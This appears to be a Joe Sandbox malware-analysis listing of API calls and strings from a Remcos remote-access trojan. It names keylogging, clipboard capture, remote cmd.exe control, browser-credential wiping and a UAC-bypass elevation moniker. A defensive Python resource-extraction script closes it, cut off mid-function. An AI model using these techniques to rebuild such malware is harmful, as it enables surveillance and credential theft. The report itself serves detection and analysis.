                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                              • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                              • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                              • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                              • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                              • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                • Part of subcall function 0041BB77: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC6C
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                              • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                              • API String ID: 2918587301-599666313
                                                                              • Opcode ID: 31bfcebef587b1b6e9556c7ff3150c16f0baeace92f9e39076f94835df6a3e2d
                                                                              • Instruction ID: 8a4068a2e00c67808ff4e441dc576a613f01372a1abbdcb91e63f440e0dcd641
                                                                              • Opcode Fuzzy Hash: 31bfcebef587b1b6e9556c7ff3150c16f0baeace92f9e39076f94835df6a3e2d
                                                                              • Instruction Fuzzy Hash: 60429371A043005BC614F776C8979AE77A99F90718F40493FF946731E2EE3CAA09C69B
                                                                              APIs
                                                                              • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475D2C,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 004334D9
                                                                                • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D2C,00456D97,?,00000000,00000000), ref: 0043350C
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                              • CreatePipe.KERNEL32(00475CEC,00475CD4,00475BF8,00000000,0046556C,00000000), ref: 0040515E
                                                                              • CreatePipe.KERNEL32(00475CD8,00475CF4,00475BF8,00000000), ref: 00405174
                                                                              • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C08,00475CDC), ref: 004051E7
                                                                                • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,?,00475D2C,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433524
                                                                                • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D2C,?,00000000,00000000), ref: 00433561
                                                                              • Sleep.KERNEL32(0000012C,00000093,?), ref: 0040523F
                                                                              • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                              • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                                              • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                              • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                              • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                              • CloseHandle.KERNEL32 ref: 004053CD
                                                                              • CloseHandle.KERNEL32 ref: 004053D5
                                                                              • CloseHandle.KERNEL32 ref: 004053E7
                                                                              • CloseHandle.KERNEL32 ref: 004053EF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                              • String ID: P\G$P\G$P\G$P\G$P\G$SystemDrive$cmd.exe
                                                                              • API String ID: 3815868655-81343324
                                                                              • Opcode ID: 10bf4400830cdb0a291db3b4d609ad2669c0122a6ef6b5deed25f3618e732387
                                                                              • Instruction ID: b18bac6d60c4c725a58799f80733fb47b3e4e6a61b1262bf76379e9ec18ff918
                                                                              • Opcode Fuzzy Hash: 10bf4400830cdb0a291db3b4d609ad2669c0122a6ef6b5deed25f3618e732387
                                                                              • Instruction Fuzzy Hash: A691E5716007056FD705BB65AC41A6F37A8EB80348F50403FF94ABA1E2EEBC9C448B6D
                                                                              APIs
                                                                              • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                              • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                              • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                • Part of subcall function 004124B7: RegOpenKeyExA.KERNELBASE(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                • Part of subcall function 004124B7: RegQueryValueExA.KERNELBASE(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                • Part of subcall function 004124B7: RegCloseKey.KERNELBASE(?), ref: 00412500
                                                                              • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                              • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                              • API String ID: 65172268-860466531
                                                                              • Opcode ID: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                              • Instruction ID: 2ec41641ff7d981187ed77e29e7d519fc89a207972baa733902a05010441332b
                                                                              • Opcode Fuzzy Hash: 639bfacccf61b4a7a246b99b22c6bb3c911c191bbe166e2da80c33d4b188edd7
                                                                              • Instruction Fuzzy Hash: 97719E3160420157C614FB32D8579AE77A8AED4718F40053FF582A21F2EF7CAA49869F
                                                                              APIs
                                                                              • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                              • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
Similarity
• API ID: Find$CloseFile$FirstNext
• String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
• API String ID: 1164774033-3681987949
APIs
• FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B5B2
• FindClose.KERNEL32(00000000), ref: 0040B5CC
• FindNextFileA.KERNEL32(00000000,?), ref: 0040B68C
• FindClose.KERNEL32(00000000), ref: 0040B6B2
• FindClose.KERNEL32(00000000), ref: 0040B6D1
Similarity
• API ID: Find$Close$File$FirstNext
• String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
• API String ID: 3527384056-432212279
APIs
• GetModuleFileNameW.KERNEL32(00000000,?,00000104,00000000,?,?,00474358), ref: 0040E233
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00474358), ref: 0040E25E
• Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
• Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
  • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
  • Part of subcall function 004127D5: RegSetValueExA.KERNELBASE(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
  • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
• CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
Similarity
• API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
• String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
• API String ID: 726551946-3025026198
APIs
• OpenClipboard.USER32 ref: 004159C7
• EmptyClipboard.USER32 ref: 004159D5
• GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
• GlobalLock.KERNEL32(00000000), ref: 004159FE
• GlobalUnlock.KERNEL32(00000000), ref: 00415A34
• SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
• CloseClipboard.USER32 ref: 00415A5A
• OpenClipboard.USER32 ref: 00415A61
• GetClipboardData.USER32(0000000D), ref: 00415A71
• GlobalLock.KERNEL32(00000000), ref: 00415A7A
• GlobalUnlock.KERNEL32(00000000), ref: 00415A83
• CloseClipboard.USER32 ref: 00415A89
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
Similarity
• API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
• String ID:
• API String ID: 3520204547-0
Similarity
• API ID:
• String ID: 0$1$2$3$4$5$6$7
• API String ID: 0-3177665633
APIs
• GetForegroundWindow.USER32 ref: 00409B3F
• GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
• GetKeyboardLayout.USER32(00000000), ref: 00409B52
• GetKeyState.USER32(00000010), ref: 00409B5C
• GetKeyboardState.USER32(?), ref: 00409B67
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
• ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
• ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
Similarity
• API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
• String ID: 8[G
• API String ID: 1888522110-1691237782
APIs
• _wcslen.LIBCMT ref: 00406788
• CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
Similarity
• API ID: Object_wcslen
• String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
• API String ID: 240030777-3166923314
APIs
• OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
• GetLastError.KERNEL32 ref: 00419935
• EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
Similarity
• API ID: EnumServicesStatus$ErrorLastManagerOpen
• String ID:
• API String ID: 3587775597-0
APIs
• FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
• FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
• DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
  • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
• RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
• GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
• FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
Similarity
• API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
• String ID:
• API String ID: 2341273852-0
APIs
• FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
• FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
Similarity
• API ID: File$Find$CreateFirstNext
• String ID: @CG$XCG$`HG$`HG$>G
• API String ID: 341183262-3780268858
APIs
• GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
• SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
• GetLastError.KERNEL32 ref: 00409A1B
  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
• GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
• TranslateMessage.USER32(?), ref: 00409A7A
• DispatchMessageA.USER32(?), ref: 00409A85
Strings
• Keylogger initialization failure: error , xrefs: 00409A32
Similarity
• API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
• String ID: Keylogger initialization failure: error
• API String ID: 3219506041-952744263
APIs
• RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
• RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026
  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
• LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
• GetProcAddress.KERNEL32(00000000), ref: 004131F4
Similarity
• API ID: AddressCloseCreateLibraryLoadProcsend
• String ID: SHDeleteKeyW$Shlwapi.dll
• API String ID: 2127411465-314212984
APIs
• DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
• GetLastError.KERNEL32 ref: 0040B261
Strings
• [Chrome StoredLogins not found], xrefs: 0040B27B
• UserProfile, xrefs: 0040B227
• \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
• [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: DeleteErrorFileLast
                                                                              • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                              • API String ID: 2018770650-1062637481
                                                                              • Opcode ID: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                              • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                              • Opcode Fuzzy Hash: 0250d3fa7d8b70bc47a8355f7fd743dddf47cdaa6e39fb173e6c2dd5a2cb84fd
                                                                              • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                              • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                              • GetLastError.KERNEL32 ref: 00416B02
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
                                                                              • String ID: SeShutdownPrivilege
                                                                              • API String ID: 3534403312-3733053543
                                                                              • Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
                                                                              • Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
                                                                              • Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5
                                                                              APIs
                                                                              • __EH_prolog.LIBCMT ref: 004089AE
                                                                                • Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212
                                                                                • Part of subcall function 0040428C: connect.WS2_32(?,?,?), ref: 004042A5
                                                                              • FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
                                                                              • FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
                                                                              • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7
                                                                                • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(?,00000000,00401943,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000), ref: 0040450E
                                                                                • Part of subcall function 00404468: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00475B70,00473EE8,00000000,?,?,?,?,?,00401943), ref: 0040453C
                                                                                • Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 004047FD
                                                                                • Part of subcall function 004047EB: SetEvent.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404808
                                                                                • Part of subcall function 004047EB: CloseHandle.KERNEL32(?,?,?,?,00000000,?,00404B8E,?,?,?,00404B26), ref: 00404811
                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1
                                                                                • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Find$CloseEventFileObjectSingleWait$Exception@8FirstH_prologHandleNextThrowconnectsendsocket
                                                                              • String ID:
                                                                              • API String ID: 4043647387-0
                                                                              • Opcode ID: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                              • Instruction ID: d7705bc86650fd6632c5f082d335fbcd32bd3fe840799e2454ee74f5ab9ae988
                                                                              • Opcode Fuzzy Hash: 5770e205a92bdaf62436f7e3a944b8f2fc74aac352c1461ab2ed34b4eace6724
                                                                              • Instruction Fuzzy Hash: 11A15C729001089ACB14EBA1DD92AEDB778AF54318F10427FF546B71D2EF385E498B98
                                                                              APIs
                                                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,?,?,0041981A,00000000,00000000), ref: 00419BCD
                                                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,?,0041981A,00000000,00000000), ref: 00419BE2
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419BEF
                                                                              • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,?,0041981A,00000000,00000000), ref: 00419BFA
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0C
                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,0041981A,00000000,00000000), ref: 00419C0F
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$Open$ManagerStart
                                                                              • String ID:
                                                                              • API String ID: 276877138-0
                                                                              • Opcode ID: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                              • Instruction ID: 9ab78235182221d9a13884b701025ebbd4d22640777282bd149d85cf0e5c5631
                                                                              • Opcode Fuzzy Hash: e25c39d92a846a462b53c10185a272e0ad60f5790e3d5b6c3523f631f015873d
                                                                              • Instruction Fuzzy Hash: 46F0E971404314AFD2115B31FC88DBF2AACEF85BA2B00043AF54193191CF68CD4595B9
                                                                              APIs
                                                                                • Part of subcall function 00416AB7: GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                • Part of subcall function 00416AB7: OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                • Part of subcall function 00416AB7: LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                • Part of subcall function 00416AB7: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                • Part of subcall function 00416AB7: GetLastError.KERNEL32 ref: 00416B02
                                                                              • ExitWindowsEx.USER32(00000000,00000001), ref: 0041595B
                                                                              • LoadLibraryA.KERNEL32(PowrProf.dll,SetSuspendState,00000000,00000000,00000000), ref: 00415970
                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415977
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ProcessToken$AddressAdjustCurrentErrorExitLastLibraryLoadLookupOpenPrivilegePrivilegesProcValueWindows
                                                                              • String ID: PowrProf.dll$SetSuspendState
                                                                              • API String ID: 1589313981-1420736420
                                                                              • Opcode ID: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction ID: 94bd0be5b4d635cf3270abd21b93e0cba208aed3fdadf5553bbce7524c8ebf13
                                                                              • Opcode Fuzzy Hash: 204994bc045b12a58d302f5ccdbfb23efbfdd41b70a37fa13545696ca80e0191
                                                                              • Instruction Fuzzy Hash: 7D2150B0604741E6CA14F7B19856AEF225A9F80748F40883FB402A72D2EF7CDC89865E
                                                                              APIs
                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002), ref: 0045127C
                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002), ref: 004512A5
                                                                              • GetACP.KERNEL32 ref: 004512BA
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID: ACP$OCP
                                                                              • API String ID: 2299586839-711371036
                                                                              • Opcode ID: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction ID: bcb6c1b5649eca6e102b6d6ca9fa22aa61ab34f591545d84575f60c76f210f03
                                                                              • Opcode Fuzzy Hash: 3e26eff85c0b030be7827b2fbb91fc7191fc27f2fce1bf15d40cdf94764cc661
                                                                              • Instruction Fuzzy Hash: 50212722600100A6D7348F54D900BAB73A6AB40B66F1645E6FD09E7322F736DD49C799
                                                                              APIs
                                                                              • FindResourceA.KERNEL32(SETTINGS,0000000A,00000000), ref: 0041A650
                                                                              • LoadResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A664
                                                                              • LockResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A66B
                                                                              • SizeofResource.KERNEL32(00000000,?,?,0040E183,00000000), ref: 0041A67A
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 0000000D.00000002.4106934102.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Resource$FindLoadLockSizeof
                                                                              • String ID: SETTINGS
                                                                              • API String ID: 3473537107-594951305
                                                                              • Opcode ID: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction ID: 83a829ee02157d331b98a48cb758db5ec39b6d120b3a3db205f860a33549a403
                                                                              • Opcode Fuzzy Hash: e32b0715ad7aadeb38a8c4a618404dc1e86643bbbf9351d1ef3d996740a46f90
                                                                              • Instruction Fuzzy Hash: 3EE01A3A200710ABCB211BA5BC8CD477E39E7867633140036F90582331DA358850CA59
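The FindResourceA/LoadResource/LockResource/SizeofResource sequence above locates an RCDATA (type 0x0A) resource named "SETTINGS" in the payload's own image; extracting that blob from a dumped PE is the first step an analyst takes toward the configuration the report lists under "Found malware configuration". The following is an added example, not Joe Sandbox code or anything from the sample: a dependency-free walker for the PE resource directory (type -> name -> language, like FindResource) that returns the raw bytes of a named RCDATA resource. It takes the raw .rsrc section and that section's RVA as input. The build_rsrc() helper, the 0x3000 section RVA and the resource contents are constructed fixtures so the script runs offline; it returns the resource bytes only and does not attempt to decode the Remcos settings format, which this report does not describe.

```python
import struct

RT_RCDATA = 10          # resource type 0x0A, the second argument in the FindResourceA call above
HIGH_BIT = 0x80000000   # in Name: "offset to string"; in OffsetToData: "points to a subdirectory"


def _entries(rsrc, dir_off):
    """Yield (key, target_off, is_subdir) for every entry of the IMAGE_RESOURCE_DIRECTORY
    at dir_off. key is an integer ID or, for named entries, the decoded UTF-16 name."""
    n_named, n_id = struct.unpack_from("<HH", rsrc, dir_off + 12)
    pos = dir_off + 16
    for _ in range(n_named + n_id):
        name, target = struct.unpack_from("<II", rsrc, pos)
        pos += 8
        if name & HIGH_BIT:                       # IMAGE_RESOURCE_DIR_STRING_U: WORD length + WCHARs
            s_off = name & ~HIGH_BIT
            length = struct.unpack_from("<H", rsrc, s_off)[0]
            key = rsrc[s_off + 2:s_off + 2 + 2 * length].decode("utf-16-le")
        else:
            key = name
        yield key, target & ~HIGH_BIT, bool(target & HIGH_BIT)


def _match(key, want):
    # FindResourceA compares string names case-insensitively; numeric IDs must match exactly.
    if isinstance(key, str) and isinstance(want, str):
        return key.upper() == want.upper()
    return key == want


def find_resource(rsrc, rsrc_rva, res_type, res_name):
    """Walk type -> name -> language and return the raw data of the first matching
    resource, or None. rsrc is the raw .rsrc section, rsrc_rva the RVA it is mapped at."""
    for key, off, is_dir in _entries(rsrc, 0):
        if not is_dir or not _match(key, res_type):
            continue
        for key2, off2, is_dir2 in _entries(rsrc, off):
            if not is_dir2 or not _match(key2, res_name):
                continue
            for _lang, off3, is_dir3 in _entries(rsrc, off2):
                if is_dir3:
                    continue
                data_rva, size = struct.unpack_from("<II", rsrc, off3)  # IMAGE_RESOURCE_DATA_ENTRY
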